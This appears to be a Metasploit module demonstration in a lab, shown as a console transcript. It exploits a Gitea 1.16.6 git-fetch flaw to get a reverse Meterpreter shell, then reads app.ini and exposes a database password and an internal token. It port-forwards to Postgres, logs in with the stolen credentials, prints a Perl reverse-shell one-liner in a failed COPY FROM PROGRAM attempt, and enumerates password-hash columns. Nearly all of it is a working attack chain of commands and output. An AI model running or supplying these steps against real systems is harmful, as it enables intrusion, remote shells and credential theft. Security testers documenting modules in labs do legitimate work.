Manually create an account in Gitea (demo_user:demo_user).
This walkthrough assumes ALLOW_LOCALNETWORKS is enabled (scenario: the same network originally had a different git server, so a migration into Gitea is now desired).
msf6 > use exploit/multi/http/gitea_git_fetch_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > set LHOST 192.168.56.20
LHOST => 192.168.56.20
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS 192.168.56.10
RHOSTS => 192.168.56.10
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/gitea_git_fetch_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/gitea_git_fetch_rce) > set username demo_user
username => demo_user
msf6 exploit(multi/http/gitea_git_fetch_rce) > set password demo_user
password => demo_user
msf6 exploit(multi/http/gitea_git_fetch_rce) > run
[*] Started reverse TCP handler on 192.168.56.20:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.56.20:8080/
[*] Using URL: http://192.168.56.20:8080/6usOy2
[*] Client 192.168.56.10 (curl/7.79.1) requested /6usOy2
[*] Sending payload to 192.168.56.10 (curl/7.79.1)
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 1 opened (192.168.56.20:4444 -> 192.168.56.10:48350) at 2025-05-19 07:35:34 -0400
[*] Command Stager progress - 100.00% done (112/112 bytes)
meterpreter > sysinfo
Computer : 172.18.0.2
OS : (Linux 5.15.0-135-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Shell commands below have been prefixed with a > for readability; this symbol is not present in the original output.
meterpreter > shell
Process 172 created.
Channel 1 created.
> env
USER=git
SHLVL=1
HOME=/data/git
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
LANG=C
PWD=/data/git/repositories/demo_user/wssbr3glpme5a.git
> ls /data
git
gitea
ssh
> ls /data/gitea
attachments
avatars
conf
indexers
jwt
log
queues
repo-archive
repo-avatars
> ls /data/gitea/conf
app.ini
> cat /data/gitea/conf/app.ini
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod
[repository]
ROOT = /data/git/repositories
[repository.local]
LOCAL_COPY_PATH = /data/gitea/tmp/local-repo
[repository.upload]
TEMP_PATH = /data/gitea/uploads
[server]
APP_DATA_PATH = /data/gitea
DOMAIN = localhost
SSH_DOMAIN = localhost
HTTP_PORT = 3000
ROOT_URL = https://gitea.vm.local/
DISABLE_SSH = false
SSH_PORT = 22
SSH_LISTEN_PORT = 22
LFS_START_SERVER = false
LFS_CONTENT_PATH = /data/git/lfs
[database]
PATH = /data/gitea/gitea.db
DB_TYPE = postgres
HOST = postgres:5432
NAME = gitea
USER = gitea
PASSWD = gitea
LOG_SQL = false
...
[log]
MODE = console
LEVEL = info
ROUTER = console
ROOT_PATH = /data/gitea/log
[security]
INSTALL_LOCK = true
SECRET_KEY =
REVERSE_PROXY_LIMIT = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3NDc2NTQxMTB9.qXWoxugJwfYRPl1mm8pQ_Z1dreWr2A2I4Aol5edV8o4
[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW = false
[migrations]
ALLOW_LOCALNETWORKS = true
For demonstration purposes, the database setup is examined next.
meterpreter > resolve postgres
Host resolutions
================
Hostname IP Address
-------- ----------
postgres 172.18.0.1
meterpreter > portfwd add -l 5432 -p 5432 -r 172.18.0.1
[*] Forward TCP relay created: (local) :5432 -> (remote) 172.18.0.1:5432
meterpreter > background
[*] Backgrounding session 1...
msf6 > use auxiliary/scanner/postgres/postgres_login
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/postgres/postgres_login) > set USERNAME gitea
USERNAME => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set PASSWORD gitea
PASSWORD => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set DATABASE gitea
DATABASE => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/postgres/postgres_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: gitea:gitea@gitea
[*] PostgreSQL session 2 opened (127.0.0.1:45027 -> 127.0.0.1:5432) at 2025-05-19 07:55:46 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed
msf6 > use auxiliary/scanner/postgres/postgres_version
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_version) > set SESSION 2
SESSION => 2
msf6 auxiliary(scanner/postgres/postgres_version) > run
[*] 127.0.0.1:5432 Postgres - Version PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit (Post-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
[*] Using configured payload cmd/unix/reverse_perl
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set SESSION 2
SESSION => 2
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.56.20
LHOST => 192.168.56.20
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.56.20:4444
[*] : - PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
[*] Exploiting...
[+] 127.0.0.1:5432 - gqBG2W1VfJT dropped successfully
[+] 127.0.0.1:5432 - gqBG2W1VfJT created successfully
[!] 127.0.0.1:5432 - Unable to execute query: COPY "gqBG2W1VfJT" FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.20:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''';
[-] Insufficient permissions, User must be superuser or in pg_read_server_files group
[-] Exploit Failed
Most exploits unfortunately require superuser privileges, as shown above: the gitea database user is neither a superuser nor a member of pg_read_server_files, so COPY ... FROM PROGRAM is refused.
msf6 > use auxiliary/admin/postgres/postgres_sql
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > set SESSION 2
SESSION => 2
msf6 auxiliary(admin/postgres/postgres_sql) > set SQL 'SELECT version();'
SQL => SELECT version();
msf6 auxiliary(admin/postgres/postgres_sql) > run
Query Text: 'SELECT version();'
===============================
version
-------
PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
[*] Auxiliary module execution completed
msf6 auxiliary(admin/postgres/postgres_sql) > set SQL "SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';"
SQL => SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';
msf6 auxiliary(admin/postgres/postgres_sql) > run
Query Text: 'SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';'
==================================================================================================================================
column_name data_type
----------- ---------
allow_create_organization boolean
allow_git_hook boolean
allow_import_local boolean
avatar character varying
...
login_name character varying
login_source bigint
login_type integer
...
passwd character varying
passwd_hash_algo character varying
...
salt character varying
...
[*] Auxiliary module execution completed